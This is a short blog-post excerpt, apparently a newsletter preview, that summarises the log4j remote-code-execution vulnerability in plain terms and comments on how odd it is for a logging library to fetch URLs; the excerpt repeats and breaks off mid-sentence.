log4j Fastly has a good explanation of the log4j vulnerability that allowed easy remote code execution by attackers. Lots of hugs to all the engineers who were on-call this week. In a nutshell, if you somehow log a specific type of URL, the library was looking up the URL and dynamically loading code that the URL might be sending back. It's a pretty crazy exploit, it's very weird to me that a logging library is ever looking up URLs. That just seems like the
Share this post
Why are we still surprised that open source…
Share this post
log4j Fastly has a good explanation of the log4j vulnerability that allowed easy remote code execution by attackers. Lots of hugs to all the engineers who were on-call this week. In a nutshell, if you somehow log a specific type of URL, the library was looking up the URL and dynamically loading code that the URL might be sending back. It's a pretty crazy exploit, it's very weird to me that a logging library is ever looking up URLs. That just seems like the